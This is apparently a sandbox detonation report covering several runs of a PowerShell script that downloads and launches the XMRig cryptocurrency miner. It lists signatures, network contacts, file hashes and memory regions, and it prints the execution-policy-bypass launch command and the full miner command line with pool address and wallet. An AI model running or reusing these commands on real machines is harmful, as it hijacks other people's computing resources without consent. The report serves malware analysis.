N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3600,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

memory/2348-0-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp

memory/2348-8-0x00000271EC370000-0x00000271EC392000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxaalfak.j1d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2348-11-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/2348-12-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/2348-14-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/2348-15-0x00000271EC700000-0x00000271EC712000-memory.dmp

memory/2348-16-0x00000271EC6F0000-0x00000271EC6FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4336-47-0x0000021342BB0000-0x0000021342BD0000-memory.dmp

memory/4336-48-0x0000021342C10000-0x0000021342C30000-memory.dmp

memory/4336-49-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/2348-50-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp

memory/4336-52-0x00000213D7090000-0x00000213D70B0000-memory.dmp

memory/4336-51-0x0000021342C30000-0x0000021342C50000-memory.dmp

memory/2348-54-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/4336-53-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/2348-56-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/4336-55-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-57-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-59-0x00000213D7090000-0x00000213D70B0000-memory.dmp

memory/4336-58-0x0000021342C30000-0x0000021342C50000-memory.dmp

memory/4336-60-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-61-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-62-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-63-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-64-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-65-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-66-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-67-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-68-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-69-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-70-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-71-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-72-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-73-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-74-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-75-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-76-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-77-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-78-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-79-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-80-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-81-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-82-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-83-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-84-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-85-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-86-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-87-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-88-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-89-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-90-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-91-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-92-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-93-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-94-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-95-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-96-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-97-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-98-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-99-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-100-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-101-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-102-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-103-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-104-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-105-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-106-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-107-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-108-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-109-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-110-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-111-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-112-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-113-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-114-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-115-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-116-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-117-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

memory/4336-118-0x00007FF7AD9B0000-0x00007FF7AE5E3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 195.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/2996-3-0x00007FFE18603000-0x00007FFE18604000-memory.dmp

memory/2996-5-0x0000026BD2EB0000-0x0000026BD2ED2000-memory.dmp

memory/2996-8-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

memory/2996-9-0x0000026BEB550000-0x0000026BEB5C6000-memory.dmp

memory/2996-10-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kdw1e00x.fqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2996-25-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

memory/2996-48-0x0000026BD2F80000-0x0000026BD2F92000-memory.dmp

memory/2996-61-0x0000026BD2F70000-0x0000026BD2F7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2964-90-0x000001CB81710000-0x000001CB81730000-memory.dmp

memory/2996-91-0x00007FFE18603000-0x00007FFE18604000-memory.dmp

memory/2996-92-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

memory/2964-93-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2996-94-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

memory/2996-96-0x00007FFE18600000-0x00007FFE18FEC000-memory.dmp

memory/2964-95-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-97-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-98-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-99-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-100-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-101-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-102-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-103-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-104-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-105-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-106-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-107-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-108-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-109-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-110-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-111-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-112-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-113-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-114-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-115-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-116-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-117-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-118-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-119-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-120-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-121-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-122-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-123-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-124-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-125-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-126-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-127-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-128-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-129-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-130-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-131-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-132-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-133-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-134-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-135-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-136-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-137-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-138-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-139-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-140-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-141-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-142-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-143-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-144-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-145-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-146-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-147-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-148-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-149-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-150-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-151-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-152-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-153-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-154-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-155-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-156-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

memory/2964-157-0x00007FF6E1E60000-0x00007FF6E2A93000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:37

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4740-0-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-5-0x000001CDEC110000-0x000001CDEC132000-memory.dmp

memory/4740-8-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-9-0x000001CDEC1C0000-0x000001CDEC236000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi3e0n33.1ki.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4740-10-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-48-0x000001CDEC340000-0x000001CDEC352000-memory.dmp

memory/4740-61-0x000001CDEC1A0000-0x000001CDEC1AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
